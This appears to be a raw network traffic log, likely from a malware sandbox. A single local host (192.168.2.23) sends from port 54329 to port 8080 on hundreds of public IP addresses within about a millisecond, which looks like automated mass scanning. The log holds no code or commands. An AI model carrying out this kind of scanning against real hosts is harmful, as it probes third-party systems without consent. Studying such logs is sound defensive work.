Nov 22, 2023 08:37:49.406905890 CET	54329	8080	192.168.2.23	94.78.126.216
Nov 22, 2023 08:37:49.406905890 CET	54329	8080	192.168.2.23	62.183.238.135
Nov 22, 2023 08:37:49.406908989 CET	54329	8080	192.168.2.23	94.27.55.92
Nov 22, 2023 08:37:49.406908989 CET	54329	8080	192.168.2.23	95.208.98.188
Nov 22, 2023 08:37:49.406908989 CET	54329	8080	192.168.2.23	85.55.133.47
Nov 22, 2023 08:37:49.406909943 CET	54329	8080	192.168.2.23	62.35.125.24
Nov 22, 2023 08:37:49.406908989 CET	54329	8080	192.168.2.23	85.143.235.232
Nov 22, 2023 08:37:49.406910896 CET	54329	8080	192.168.2.23	31.39.231.58
Nov 22, 2023 08:37:49.406909943 CET	54329	8080	192.168.2.23	85.197.7.145
Nov 22, 2023 08:37:49.406915903 CET	54329	8080	192.168.2.23	94.159.94.221
Nov 22, 2023 08:37:49.406915903 CET	54329	8080	192.168.2.23	94.136.102.168
Nov 22, 2023 08:37:49.406917095 CET	54329	8080	192.168.2.23	85.142.15.39
Nov 22, 2023 08:37:49.406915903 CET	54329	8080	192.168.2.23	95.52.35.18
Nov 22, 2023 08:37:49.406917095 CET	54329	8080	192.168.2.23	95.168.78.100
Nov 22, 2023 08:37:49.406919003 CET	54329	8080	192.168.2.23	95.210.93.225
Nov 22, 2023 08:37:49.406919003 CET	54329	8080	192.168.2.23	62.22.209.253
Nov 22, 2023 08:37:49.406930923 CET	54329	8080	192.168.2.23	31.191.57.86
Nov 22, 2023 08:37:49.406943083 CET	54329	8080	192.168.2.23	95.142.90.122
Nov 22, 2023 08:37:49.406949043 CET	54329	8080	192.168.2.23	94.199.18.38
Nov 22, 2023 08:37:49.406949043 CET	54329	8080	192.168.2.23	95.145.208.207
Nov 22, 2023 08:37:49.406950951 CET	54329	8080	192.168.2.23	94.12.214.247
Nov 22, 2023 08:37:49.406950951 CET	54329	8080	192.168.2.23	95.233.231.54
Nov 22, 2023 08:37:49.406949043 CET	54329	8080	192.168.2.23	85.17.35.75
Nov 22, 2023 08:37:49.406950951 CET	54329	8080	192.168.2.23	95.209.240.87
Nov 22, 2023 08:37:49.406949043 CET	54329	8080	192.168.2.23	94.72.246.65
Nov 22, 2023 08:37:49.406955957 CET	54329	8080	192.168.2.23	62.116.7.45
Nov 22, 2023 08:37:49.406966925 CET	54329	8080	192.168.2.23	95.202.76.185
Nov 22, 2023 08:37:49.406975031 CET	54329	8080	192.168.2.23	94.61.45.209
Nov 22, 2023 08:37:49.406975031 CET	54329	8080	192.168.2.23	95.40.246.84
Nov 22, 2023 08:37:49.406977892 CET	54329	8080	192.168.2.23	62.219.120.209
Nov 22, 2023 08:37:49.406977892 CET	54329	8080	192.168.2.23	95.226.216.179
Nov 22, 2023 08:37:49.406984091 CET	54329	8080	192.168.2.23	62.221.11.154
Nov 22, 2023 08:37:49.406984091 CET	54329	8080	192.168.2.23	94.93.71.29
Nov 22, 2023 08:37:49.406985998 CET	54329	8080	192.168.2.23	95.82.225.33
Nov 22, 2023 08:37:49.406985998 CET	54329	8080	192.168.2.23	31.117.102.144
Nov 22, 2023 08:37:49.407001972 CET	54329	8080	192.168.2.23	62.106.146.250
Nov 22, 2023 08:37:49.407005072 CET	54329	8080	192.168.2.23	62.15.104.110
Nov 22, 2023 08:37:49.407006979 CET	54329	8080	192.168.2.23	94.66.127.237
Nov 22, 2023 08:37:49.407006979 CET	54329	8080	192.168.2.23	94.86.192.94
Nov 22, 2023 08:37:49.407011032 CET	54329	8080	192.168.2.23	95.127.248.218
Nov 22, 2023 08:37:49.407017946 CET	54329	8080	192.168.2.23	94.12.218.165
Nov 22, 2023 08:37:49.407021046 CET	54329	8080	192.168.2.23	85.88.1.220
Nov 22, 2023 08:37:49.407021046 CET	54329	8080	192.168.2.23	85.204.30.140
Nov 22, 2023 08:37:49.407021999 CET	54329	8080	192.168.2.23	94.24.224.94
Nov 22, 2023 08:37:49.407021999 CET	54329	8080	192.168.2.23	94.116.77.56
Nov 22, 2023 08:37:49.407037020 CET	54329	8080	192.168.2.23	85.24.209.55
Nov 22, 2023 08:37:49.407038927 CET	54329	8080	192.168.2.23	85.188.191.106
Nov 22, 2023 08:37:49.407038927 CET	54329	8080	192.168.2.23	85.66.73.217
Nov 22, 2023 08:37:49.407038927 CET	54329	8080	192.168.2.23	85.48.226.153
Nov 22, 2023 08:37:49.407038927 CET	54329	8080	192.168.2.23	85.171.213.125
Nov 22, 2023 08:37:49.407044888 CET	54329	8080	192.168.2.23	31.153.228.183
Nov 22, 2023 08:37:49.407044888 CET	54329	8080	192.168.2.23	85.121.46.35
Nov 22, 2023 08:37:49.407046080 CET	54329	8080	192.168.2.23	62.53.208.172
Nov 22, 2023 08:37:49.407046080 CET	54329	8080	192.168.2.23	95.252.71.188
Nov 22, 2023 08:37:49.407046080 CET	54329	8080	192.168.2.23	95.157.74.2
Nov 22, 2023 08:37:49.407061100 CET	54329	8080	192.168.2.23	85.229.220.255
Nov 22, 2023 08:37:49.407066107 CET	54329	8080	192.168.2.23	95.18.145.167
Nov 22, 2023 08:37:49.407066107 CET	54329	8080	192.168.2.23	94.40.183.118
Nov 22, 2023 08:37:49.407068968 CET	54329	8080	192.168.2.23	62.252.186.209
Nov 22, 2023 08:37:49.407068968 CET	54329	8080	192.168.2.23	62.236.213.89
Nov 22, 2023 08:37:49.407068968 CET	54329	8080	192.168.2.23	62.57.27.1
Nov 22, 2023 08:37:49.407068968 CET	54329	8080	192.168.2.23	62.195.35.113
Nov 22, 2023 08:37:49.407069921 CET	54329	8080	192.168.2.23	85.89.24.222
Nov 22, 2023 08:37:49.407069921 CET	54329	8080	192.168.2.23	95.79.160.175
Nov 22, 2023 08:37:49.407077074 CET	54329	8080	192.168.2.23	62.180.148.72
Nov 22, 2023 08:37:49.407077074 CET	54329	8080	192.168.2.23	31.101.135.213
Nov 22, 2023 08:37:49.407078028 CET	54329	8080	192.168.2.23	31.136.219.234
Nov 22, 2023 08:37:49.407082081 CET	54329	8080	192.168.2.23	85.89.62.77
Nov 22, 2023 08:37:49.407082081 CET	54329	8080	192.168.2.23	31.151.45.107
Nov 22, 2023 08:37:49.407088041 CET	54329	8080	192.168.2.23	31.33.224.56
Nov 22, 2023 08:37:49.407093048 CET	54329	8080	192.168.2.23	95.53.49.248
Nov 22, 2023 08:37:49.407109976 CET	54329	8080	192.168.2.23	31.145.74.34
Nov 22, 2023 08:37:49.407109976 CET	54329	8080	192.168.2.23	95.237.191.20
Nov 22, 2023 08:37:49.407109976 CET	54329	8080	192.168.2.23	95.42.161.108
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	31.55.79.152
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	62.125.142.154
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	85.167.216.219
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	62.97.202.47
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	31.21.254.69
Nov 22, 2023 08:37:49.407113075 CET	54329	8080	192.168.2.23	31.180.65.179
Nov 22, 2023 08:37:49.407124996 CET	54329	8080	192.168.2.23	31.207.148.54
Nov 22, 2023 08:37:49.407129049 CET	54329	8080	192.168.2.23	95.75.173.60
Nov 22, 2023 08:37:49.407133102 CET	54329	8080	192.168.2.23	31.159.122.179
Nov 22, 2023 08:37:49.407138109 CET	54329	8080	192.168.2.23	95.96.239.208
Nov 22, 2023 08:37:49.407140017 CET	54329	8080	192.168.2.23	94.214.62.180
Nov 22, 2023 08:37:49.407143116 CET	54329	8080	192.168.2.23	62.43.74.231
Nov 22, 2023 08:37:49.407144070 CET	54329	8080	192.168.2.23	31.252.82.37
Nov 22, 2023 08:37:49.407144070 CET	54329	8080	192.168.2.23	31.210.14.221
Nov 22, 2023 08:37:49.407147884 CET	54329	8080	192.168.2.23	95.79.239.17
Nov 22, 2023 08:37:49.407150030 CET	54329	8080	192.168.2.23	62.89.159.180
Nov 22, 2023 08:37:49.407154083 CET	54329	8080	192.168.2.23	62.40.144.245
Nov 22, 2023 08:37:49.407157898 CET	54329	8080	192.168.2.23	95.203.88.209
Nov 22, 2023 08:37:49.407166958 CET	54329	8080	192.168.2.23	95.111.6.237
Nov 22, 2023 08:37:49.407167912 CET	54329	8080	192.168.2.23	85.128.194.152
Nov 22, 2023 08:37:49.407174110 CET	54329	8080	192.168.2.23	94.75.222.22
Nov 22, 2023 08:37:49.407174110 CET	54329	8080	192.168.2.23	94.140.198.253
Nov 22, 2023 08:37:49.407181978 CET	54329	8080	192.168.2.23	94.133.74.140
Nov 22, 2023 08:37:49.407182932 CET	54329	8080	192.168.2.23	94.52.47.21
Nov 22, 2023 08:37:49.407183886 CET	54329	8080	192.168.2.23	95.131.160.231
Nov 22, 2023 08:37:49.407181978 CET	54329	8080	192.168.2.23	95.145.62.135
Nov 22, 2023 08:37:49.407185078 CET	54329	8080	192.168.2.23	85.94.182.220
Nov 22, 2023 08:37:49.407190084 CET	54329	8080	192.168.2.23	85.157.164.239
Nov 22, 2023 08:37:49.407190084 CET	54329	8080	192.168.2.23	94.193.51.145
Nov 22, 2023 08:37:49.407198906 CET	54329	8080	192.168.2.23	85.221.186.119
Nov 22, 2023 08:37:49.407200098 CET	54329	8080	192.168.2.23	94.196.61.183
Nov 22, 2023 08:37:49.407205105 CET	54329	8080	192.168.2.23	85.9.125.15
Nov 22, 2023 08:37:49.407205105 CET	54329	8080	192.168.2.23	31.45.65.87
Nov 22, 2023 08:37:49.407205105 CET	54329	8080	192.168.2.23	94.164.41.138
Nov 22, 2023 08:37:49.407207012 CET	54329	8080	192.168.2.23	62.21.193.135
Nov 22, 2023 08:37:49.407217026 CET	54329	8080	192.168.2.23	31.240.248.33
Nov 22, 2023 08:37:49.407217026 CET	54329	8080	192.168.2.23	85.136.77.238
Nov 22, 2023 08:37:49.407217979 CET	54329	8080	192.168.2.23	94.27.164.229
Nov 22, 2023 08:37:49.407231092 CET	54329	8080	192.168.2.23	95.9.116.204
Nov 22, 2023 08:37:49.407234907 CET	54329	8080	192.168.2.23	95.242.83.66
Nov 22, 2023 08:37:49.407234907 CET	54329	8080	192.168.2.23	95.18.56.103
Nov 22, 2023 08:37:49.407239914 CET	54329	8080	192.168.2.23	95.59.153.209
Nov 22, 2023 08:37:49.407243013 CET	54329	8080	192.168.2.23	31.125.86.10
Nov 22, 2023 08:37:49.407255888 CET	54329	8080	192.168.2.23	94.242.133.193
Nov 22, 2023 08:37:49.407255888 CET	54329	8080	192.168.2.23	62.26.27.72
Nov 22, 2023 08:37:49.407255888 CET	54329	8080	192.168.2.23	95.72.229.224
Nov 22, 2023 08:37:49.407269955 CET	54329	8080	192.168.2.23	62.141.150.45
Nov 22, 2023 08:37:49.407269955 CET	54329	8080	192.168.2.23	94.205.181.200
Nov 22, 2023 08:37:49.407269955 CET	54329	8080	192.168.2.23	94.200.122.104
Nov 22, 2023 08:37:49.407269955 CET	54329	8080	192.168.2.23	95.213.37.187
Nov 22, 2023 08:37:49.407269955 CET	54329	8080	192.168.2.23	94.134.48.162
Nov 22, 2023 08:37:49.407274008 CET	54329	8080	192.168.2.23	94.70.94.75
Nov 22, 2023 08:37:49.407272100 CET	54329	8080	192.168.2.23	85.166.211.87
Nov 22, 2023 08:37:49.407274008 CET	54329	8080	192.168.2.23	95.84.231.23
Nov 22, 2023 08:37:49.407280922 CET	54329	8080	192.168.2.23	31.58.182.110
Nov 22, 2023 08:37:49.407280922 CET	54329	8080	192.168.2.23	85.200.174.249
Nov 22, 2023 08:37:49.407282114 CET	54329	8080	192.168.2.23	94.91.96.237
Nov 22, 2023 08:37:49.407282114 CET	54329	8080	192.168.2.23	62.233.64.249
Nov 22, 2023 08:37:49.407282114 CET	54329	8080	192.168.2.23	85.31.45.139
Nov 22, 2023 08:37:49.407301903 CET	54329	8080	192.168.2.23	85.244.84.137
Nov 22, 2023 08:37:49.407303095 CET	54329	8080	192.168.2.23	85.188.143.107
Nov 22, 2023 08:37:49.407310963 CET	54329	8080	192.168.2.23	62.180.88.247
Nov 22, 2023 08:37:49.407315016 CET	54329	8080	192.168.2.23	85.49.69.189
Nov 22, 2023 08:37:49.407315016 CET	54329	8080	192.168.2.23	95.192.69.100
Nov 22, 2023 08:37:49.407315969 CET	54329	8080	192.168.2.23	62.153.228.141
Nov 22, 2023 08:37:49.407315969 CET	54329	8080	192.168.2.23	94.112.181.183
Nov 22, 2023 08:37:49.407315969 CET	54329	8080	192.168.2.23	94.65.2.11
Nov 22, 2023 08:37:49.407315969 CET	54329	8080	192.168.2.23	94.26.187.21
Nov 22, 2023 08:37:49.407318115 CET	54329	8080	192.168.2.23	95.239.59.173
Nov 22, 2023 08:37:49.407316923 CET	54329	8080	192.168.2.23	94.221.39.254
Nov 22, 2023 08:37:49.407318115 CET	54329	8080	192.168.2.23	95.173.254.28
Nov 22, 2023 08:37:49.407320976 CET	54329	8080	192.168.2.23	62.179.38.28
Nov 22, 2023 08:37:49.407320976 CET	54329	8080	192.168.2.23	31.80.35.95
Nov 22, 2023 08:37:49.407329082 CET	54329	8080	192.168.2.23	95.141.126.191
Nov 22, 2023 08:37:49.407330990 CET	54329	8080	192.168.2.23	85.54.37.131
Nov 22, 2023 08:37:49.407329082 CET	54329	8080	192.168.2.23	95.139.50.104
Nov 22, 2023 08:37:49.407340050 CET	54329	8080	192.168.2.23	85.157.196.63
Nov 22, 2023 08:37:49.407342911 CET	54329	8080	192.168.2.23	31.169.144.76
Nov 22, 2023 08:37:49.407342911 CET	54329	8080	192.168.2.23	85.78.42.88
Nov 22, 2023 08:37:49.407345057 CET	54329	8080	192.168.2.23	85.145.12.60
Nov 22, 2023 08:37:49.407352924 CET	54329	8080	192.168.2.23	85.50.215.115
Nov 22, 2023 08:37:49.407352924 CET	54329	8080	192.168.2.23	85.86.201.184
Nov 22, 2023 08:37:49.407352924 CET	54329	8080	192.168.2.23	31.139.164.18
Nov 22, 2023 08:37:49.407352924 CET	54329	8080	192.168.2.23	62.191.5.239
Nov 22, 2023 08:37:49.407352924 CET	54329	8080	192.168.2.23	94.177.66.186
Nov 22, 2023 08:37:49.407361984 CET	54329	8080	192.168.2.23	94.149.196.246
Nov 22, 2023 08:37:49.407363892 CET	54329	8080	192.168.2.23	85.197.51.136
Nov 22, 2023 08:37:49.407365084 CET	54329	8080	192.168.2.23	62.30.62.127
Nov 22, 2023 08:37:49.407376051 CET	54329	8080	192.168.2.23	62.15.119.103
Nov 22, 2023 08:37:49.407378912 CET	54329	8080	192.168.2.23	94.35.134.56
Nov 22, 2023 08:37:49.407378912 CET	54329	8080	192.168.2.23	62.45.214.19
Nov 22, 2023 08:37:49.407386065 CET	54329	8080	192.168.2.23	62.39.220.244
Nov 22, 2023 08:37:49.407386065 CET	54329	8080	192.168.2.23	85.98.114.189
Nov 22, 2023 08:37:49.407386065 CET	54329	8080	192.168.2.23	95.117.135.3
Nov 22, 2023 08:37:49.407390118 CET	54329	8080	192.168.2.23	31.21.170.84
Nov 22, 2023 08:37:49.407407045 CET	54329	8080	192.168.2.23	31.120.72.35
Nov 22, 2023 08:37:49.407408953 CET	54329	8080	192.168.2.23	95.208.174.238
Nov 22, 2023 08:37:49.407413960 CET	54329	8080	192.168.2.23	31.137.18.50
Nov 22, 2023 08:37:49.407413960 CET	54329	8080	192.168.2.23	85.151.231.5
Nov 22, 2023 08:37:49.407417059 CET	54329	8080	192.168.2.23	31.166.51.112
Nov 22, 2023 08:37:49.407417059 CET	54329	8080	192.168.2.23	95.244.231.92
Nov 22, 2023 08:37:49.407424927 CET	54329	8080	192.168.2.23	85.226.34.94
Nov 22, 2023 08:37:49.407426119 CET	54329	8080	192.168.2.23	85.47.78.10
Nov 22, 2023 08:37:49.407427073 CET	54329	8080	192.168.2.23	85.64.132.27
Nov 22, 2023 08:37:49.407435894 CET	54329	8080	192.168.2.23	95.169.242.62
Nov 22, 2023 08:37:49.407435894 CET	54329	8080	192.168.2.23	95.247.159.241
Nov 22, 2023 08:37:49.407460928 CET	54329	8080	192.168.2.23	94.223.106.244
Nov 22, 2023 08:37:49.407460928 CET	54329	8080	192.168.2.23	95.247.120.246
Nov 22, 2023 08:37:49.407463074 CET	54329	8080	192.168.2.23	85.215.193.202
Nov 22, 2023 08:37:49.407463074 CET	54329	8080	192.168.2.23	85.22.64.159
Nov 22, 2023 08:37:49.407463074 CET	54329	8080	192.168.2.23	85.118.183.14
Nov 22, 2023 08:37:49.407463074 CET	54329	8080	192.168.2.23	85.141.109.133
Nov 22, 2023 08:37:49.407468081 CET	54329	8080	192.168.2.23	95.98.102.225
Nov 22, 2023 08:37:49.407468081 CET	54329	8080	192.168.2.23	31.124.247.224
Nov 22, 2023 08:37:49.407470942 CET	54329	8080	192.168.2.23	85.149.200.123
Nov 22, 2023 08:37:49.407470942 CET	54329	8080	192.168.2.23	31.195.87.47
Nov 22, 2023 08:37:49.407470942 CET	54329	8080	192.168.2.23	94.161.100.253
Nov 22, 2023 08:37:49.407474041 CET	54329	8080	192.168.2.23	85.21.241.229
Nov 22, 2023 08:37:49.407474041 CET	54329	8080	192.168.2.23	94.255.181.237
Nov 22, 2023 08:37:49.407474041 CET	54329	8080	192.168.2.23	95.83.22.79
Nov 22, 2023 08:37:49.407476902 CET	54329	8080	192.168.2.23	31.187.183.159
Nov 22, 2023 08:37:49.407484055 CET	54329	8080	192.168.2.23	94.61.194.54
Nov 22, 2023 08:37:49.407485962 CET	54329	8080	192.168.2.23	85.16.73.21
Nov 22, 2023 08:37:49.407484055 CET	54329	8080	192.168.2.23	85.114.207.178
Nov 22, 2023 08:37:49.407485962 CET	54329	8080	192.168.2.23	31.151.187.96
Nov 22, 2023 08:37:49.407484055 CET	54329	8080	192.168.2.23	94.148.251.52
Nov 22, 2023 08:37:49.407484055 CET	54329	8080	192.168.2.23	31.111.150.110
Nov 22, 2023 08:37:49.407490969 CET	54329	8080	192.168.2.23	94.20.189.112
Nov 22, 2023 08:37:49.407490969 CET	54329	8080	192.168.2.23	85.183.1.252
Nov 22, 2023 08:37:49.407490969 CET	54329	8080	192.168.2.23	94.67.87.21
Nov 22, 2023 08:37:49.407490969 CET	54329	8080	192.168.2.23	85.169.107.93
Nov 22, 2023 08:37:49.407495975 CET	54329	8080	192.168.2.23	31.58.85.37
Nov 22, 2023 08:37:49.407510042 CET	54329	8080	192.168.2.23	31.111.7.127
Nov 22, 2023 08:37:49.407514095 CET	54329	8080	192.168.2.23	62.0.111.59
Nov 22, 2023 08:37:49.407514095 CET	54329	8080	192.168.2.23	31.148.70.50
Nov 22, 2023 08:37:49.407514095 CET	54329	8080	192.168.2.23	95.244.161.105
Nov 22, 2023 08:37:49.407521963 CET	54329	8080	192.168.2.23	62.128.4.76
Nov 22, 2023 08:37:49.407531023 CET	54329	8080	192.168.2.23	31.79.1.50
Nov 22, 2023 08:37:49.407533884 CET	54329	8080	192.168.2.23	85.93.241.8
Nov 22, 2023 08:37:49.407533884 CET	54329	8080	192.168.2.23	62.228.143.161
Nov 22, 2023 08:37:49.407538891 CET	54329	8080	192.168.2.23	94.114.110.125
Nov 22, 2023 08:37:49.407538891 CET	54329	8080	192.168.2.23	95.170.62.85
Nov 22, 2023 08:37:49.407560110 CET	54329	8080	192.168.2.23	95.190.89.148
Nov 22, 2023 08:37:49.407561064 CET	54329	8080	192.168.2.23	95.64.176.82
Nov 22, 2023 08:37:49.407561064 CET	54329	8080	192.168.2.23	62.252.19.244
Nov 22, 2023 08:37:49.407572985 CET	54329	8080	192.168.2.23	85.132.149.116
Nov 22, 2023 08:37:49.407577991 CET	54329	8080	192.168.2.23	31.19.193.232
Nov 22, 2023 08:37:49.407582045 CET	54329	8080	192.168.2.23	94.12.152.123
Nov 22, 2023 08:37:49.407598972 CET	54329	8080	192.168.2.23	94.34.162.140
Nov 22, 2023 08:37:49.407598972 CET	54329	8080	192.168.2.23	31.55.20.174
Nov 22, 2023 08:37:49.407598972 CET	54329	8080	192.168.2.23	31.129.99.177
Nov 22, 2023 08:37:49.407603025 CET	54329	8080	192.168.2.23	85.252.242.18
Nov 22, 2023 08:37:49.407603025 CET	54329	8080	192.168.2.23	62.46.111.92
Nov 22, 2023 08:37:49.407617092 CET	54329	8080	192.168.2.23	62.223.164.221
Nov 22, 2023 08:37:49.407638073 CET	54329	8080	192.168.2.23	85.80.152.194
Nov 22, 2023 08:37:49.407638073 CET	54329	8080	192.168.2.23	62.144.64.205
Nov 22, 2023 08:37:49.407638073 CET	54329	8080	192.168.2.23	95.134.216.41
Nov 22, 2023 08:37:49.407639980 CET	54329	8080	192.168.2.23	85.176.16.203
Nov 22, 2023 08:37:49.407641888 CET	54329	8080	192.168.2.23	95.159.122.192
Nov 22, 2023 08:37:49.407641888 CET	54329	8080	192.168.2.23	62.103.51.92
Nov 22, 2023 08:37:49.407643080 CET	54329	8080	192.168.2.23	62.57.191.223
Nov 22, 2023 08:37:49.407646894 CET	54329	8080	192.168.2.23	31.155.185.3
Nov 22, 2023 08:37:49.407651901 CET	54329	8080	192.168.2.23	31.27.76.183
Nov 22, 2023 08:37:49.407670021 CET	54329	8080	192.168.2.23	85.14.139.45
Nov 22, 2023 08:37:49.407670975 CET	54329	8080	192.168.2.23	94.22.254.201
Nov 22, 2023 08:37:49.407672882 CET	54329	8080	192.168.2.23	62.166.245.149
Nov 22, 2023 08:37:49.407674074 CET	54329	8080	192.168.2.23	31.35.30.96
Nov 22, 2023 08:37:49.407675982 CET	54329	8080	192.168.2.23	94.91.81.173
Nov 22, 2023 08:37:49.407675982 CET	54329	8080	192.168.2.23	62.141.52.168
Nov 22, 2023 08:37:49.407675982 CET	54329	8080	192.168.2.23	85.141.129.33
Nov 22, 2023 08:37:49.407686949 CET	54329	8080	192.168.2.23	85.198.193.72
Nov 22, 2023 08:37:49.407696962 CET	54329	8080	192.168.2.23	95.201.89.40
Nov 22, 2023 08:37:49.407711983 CET	54329	8080	192.168.2.23	85.192.8.26
Nov 22, 2023 08:37:49.407711983 CET	54329	8080	192.168.2.23	31.166.216.221
Nov 22, 2023 08:37:49.407713890 CET	54329	8080	192.168.2.23	95.164.14.166
Nov 22, 2023 08:37:49.407715082 CET	54329	8080	192.168.2.23	31.110.227.166
Nov 22, 2023 08:37:49.407715082 CET	54329	8080	192.168.2.23	31.164.133.209
Nov 22, 2023 08:37:49.407715082 CET	54329	8080	192.168.2.23	62.155.107.145
Nov 22, 2023 08:37:49.407727003 CET	54329	8080	192.168.2.23	85.112.100.61
Nov 22, 2023 08:37:49.407732010 CET	54329	8080	192.168.2.23	94.80.220.39
Nov 22, 2023 08:37:49.407743931 CET	54329	8080	192.168.2.23	95.188.132.59
Nov 22, 2023 08:37:49.407748938 CET	54329	8080	192.168.2.23	94.214.179.149
Nov 22, 2023 08:37:49.407748938 CET	54329	8080	192.168.2.23	94.73.132.75
Nov 22, 2023 08:37:49.407748938 CET	54329	8080	192.168.2.23	85.111.231.122
Nov 22, 2023 08:37:49.407752037 CET	54329	8080	192.168.2.23	31.130.114.164
Nov 22, 2023 08:37:49.407752037 CET	54329	8080	192.168.2.23	62.95.170.44
Nov 22, 2023 08:37:49.407753944 CET	54329	8080	192.168.2.23	31.242.131.121
Nov 22, 2023 08:37:49.407763958 CET	54329	8080	192.168.2.23	94.208.166.184
Nov 22, 2023 08:37:49.407769918 CET	54329	8080	192.168.2.23	85.164.215.14
Nov 22, 2023 08:37:49.407768965 CET	54329	8080	192.168.2.23	62.165.124.252
Nov 22, 2023 08:37:49.407769918 CET	54329	8080	192.168.2.23	62.233.36.78
Nov 22, 2023 08:37:49.407772064 CET	54329	8080	192.168.2.23	85.169.250.220
Nov 22, 2023 08:37:49.407773018 CET	54329	8080	192.168.2.23	62.100.51.133
Nov 22, 2023 08:37:49.407782078 CET	54329	8080	192.168.2.23	31.133.195.64
Nov 22, 2023 08:37:49.407789946 CET	54329	8080	192.168.2.23	62.123.189.212
Nov 22, 2023 08:37:49.407794952 CET	54329	8080	192.168.2.23	94.202.114.214
Nov 22, 2023 08:37:49.407799006 CET	54329	8080	192.168.2.23	31.177.64.251
Nov 22, 2023 08:37:49.407814026 CET	54329	8080	192.168.2.23	62.92.47.195
Nov 22, 2023 08:37:49.407821894 CET	54329	8080	192.168.2.23	94.71.59.165
Nov 22, 2023 08:37:49.407821894 CET	54329	8080	192.168.2.23	31.31.141.121
Nov 22, 2023 08:37:49.407821894 CET	54329	8080	192.168.2.23	95.195.139.207
Nov 22, 2023 08:37:49.407824993 CET	54329	8080	192.168.2.23	31.140.79.101
Nov 22, 2023 08:37:49.407835007 CET	54329	8080	192.168.2.23	85.12.87.213
Nov 22, 2023 08:37:49.407838106 CET	54329	8080	192.168.2.23	94.225.13.211
Nov 22, 2023 08:37:49.407838106 CET	54329	8080	192.168.2.23	62.133.146.86
Nov 22, 2023 08:37:49.407838106 CET	54329	8080	192.168.2.23	95.36.30.83
Nov 22, 2023 08:37:49.407846928 CET	54329	8080	192.168.2.23	94.42.69.220
Nov 22, 2023 08:37:49.407850027 CET	54329	8080	192.168.2.23	62.7.62.76
Nov 22, 2023 08:37:49.407850027 CET	54329	8080	192.168.2.23	95.214.90.47
Nov 22, 2023 08:37:49.407850027 CET	54329	8080	192.168.2.23	62.134.76.24
Nov 22, 2023 08:37:49.407850027 CET	54329	8080	192.168.2.23	85.235.148.163
Nov 22, 2023 08:37:49.407864094 CET	54329	8080	192.168.2.23	94.83.155.142
Nov 22, 2023 08:37:49.407864094 CET	54329	8080	192.168.2.23	62.153.78.93
Nov 22, 2023 08:37:49.407876015 CET	54329	8080	192.168.2.23	31.231.163.229
Nov 22, 2023 08:37:49.407881975 CET	54329	8080	192.168.2.23	95.48.96.135
Nov 22, 2023 08:37:49.407895088 CET	54329	8080	192.168.2.23	95.229.96.135
Nov 22, 2023 08:37:49.407895088 CET	54329	8080	192.168.2.23	94.20.61.204
Nov 22, 2023 08:37:49.407900095 CET	54329	8080	192.168.2.23	85.142.55.25
Nov 22, 2023 08:37:49.407913923 CET	54329	8080	192.168.2.23	95.14.35.12
Nov 22, 2023 08:37:49.407917023 CET	54329	8080	192.168.2.23	95.5.91.205
Nov 22, 2023 08:37:49.407917023 CET	54329	8080	192.168.2.23	62.73.228.150
Nov 22, 2023 08:37:49.407918930 CET	54329	8080	192.168.2.23	31.221.4.5
Nov 22, 2023 08:37:49.407918930 CET	54329	8080	192.168.2.23	31.17.234.136
Nov 22, 2023 08:37:49.407918930 CET	54329	8080	192.168.2.23	95.1.175.2
Nov 22, 2023 08:37:49.407919884 CET	54329	8080	192.168.2.23	85.46.206.40
Nov 22, 2023 08:37:49.407919884 CET	54329	8080	192.168.2.23	85.31.246.6
Nov 22, 2023 08:37:49.407918930 CET	54329	8080	192.168.2.23	85.143.72.19
Nov 22, 2023 08:37:49.407919884 CET	54329	8080	192.168.2.23	85.4.240.189
Nov 22, 2023 08:37:49.407919884 CET	54329	8080	192.168.2.23	31.194.246.2
Nov 22, 2023 08:37:49.407919884 CET	54329	8080	192.168.2.23	95.127.81.127
Nov 22, 2023 08:37:49.407933950 CET	54329	8080	192.168.2.23	62.148.56.81
Nov 22, 2023 08:37:49.407944918 CET	54329	8080	192.168.2.23	95.14.153.120
Nov 22, 2023 08:37:49.407944918 CET	54329	8080	192.168.2.23	62.1.62.104
Nov 22, 2023 08:37:49.407944918 CET	54329	8080	192.168.2.23	95.46.87.16
Nov 22, 2023 08:37:49.407963037 CET	54329	8080	192.168.2.23	94.149.204.238
Nov 22, 2023 08:37:49.407979012 CET	54329	8080	192.168.2.23	31.67.5.168
Nov 22, 2023 08:37:49.407983065 CET	54329	8080	192.168.2.23	62.187.47.7
Nov 22, 2023 08:37:49.407987118 CET	54329	8080	192.168.2.23	94.45.8.164
Nov 22, 2023 08:37:49.407987118 CET	54329	8080	192.168.2.23	85.24.33.46
Nov 22, 2023 08:37:49.407991886 CET	54329	8080	192.168.2.23	95.201.19.24
Nov 22, 2023 08:37:49.407993078 CET	54329	8080	192.168.2.23	94.199.4.165
Nov 22, 2023 08:37:49.407991886 CET	54329	8080	192.168.2.23	94.2.81.242
Nov 22, 2023 08:37:49.407993078 CET	54329	8080	192.168.2.23	62.193.156.240
Nov 22, 2023 08:37:49.407999992 CET	54329	8080	192.168.2.23	62.199.87.114
Nov 22, 2023 08:37:49.408024073 CET	54329	8080	192.168.2.23	31.225.196.28
Nov 22, 2023 08:37:49.408039093 CET	54329	8080	192.168.2.23	94.229.195.87
Nov 22, 2023 08:37:49.408040047 CET	54329	8080	192.168.2.23	31.115.34.14
Nov 22, 2023 08:37:49.408056974 CET	54329	8080	192.168.2.23	95.74.34.63
Nov 22, 2023 08:37:49.408057928 CET	54329	8080	192.168.2.23	85.146.226.127
Nov 22, 2023 08:37:49.408057928 CET	54329	8080	192.168.2.23	62.87.83.115
Nov 22, 2023 08:37:49.408061028 CET	54329	8080	192.168.2.23	62.239.205.205
Nov 22, 2023 08:37:49.408072948 CET	54329	8080	192.168.2.23	95.5.84.235
Nov 22, 2023 08:37:49.408073902 CET	54329	8080	192.168.2.23	62.172.66.174
Nov 22, 2023 08:37:49.408076048 CET	54329	8080	192.168.2.23	94.19.220.77
Nov 22, 2023 08:37:49.408101082 CET	54329	8080	192.168.2.23	85.93.81.125
Nov 22, 2023 08:37:49.408101082 CET	54329	8080	192.168.2.23	85.157.149.49
Nov 22, 2023 08:37:49.408102036 CET	54329	8080	192.168.2.23	85.125.10.87
Nov 22, 2023 08:37:49.408102989 CET	54329	8080	192.168.2.23	31.117.150.140
Nov 22, 2023 08:37:49.408102989 CET	54329	8080	192.168.2.23	62.144.49.54
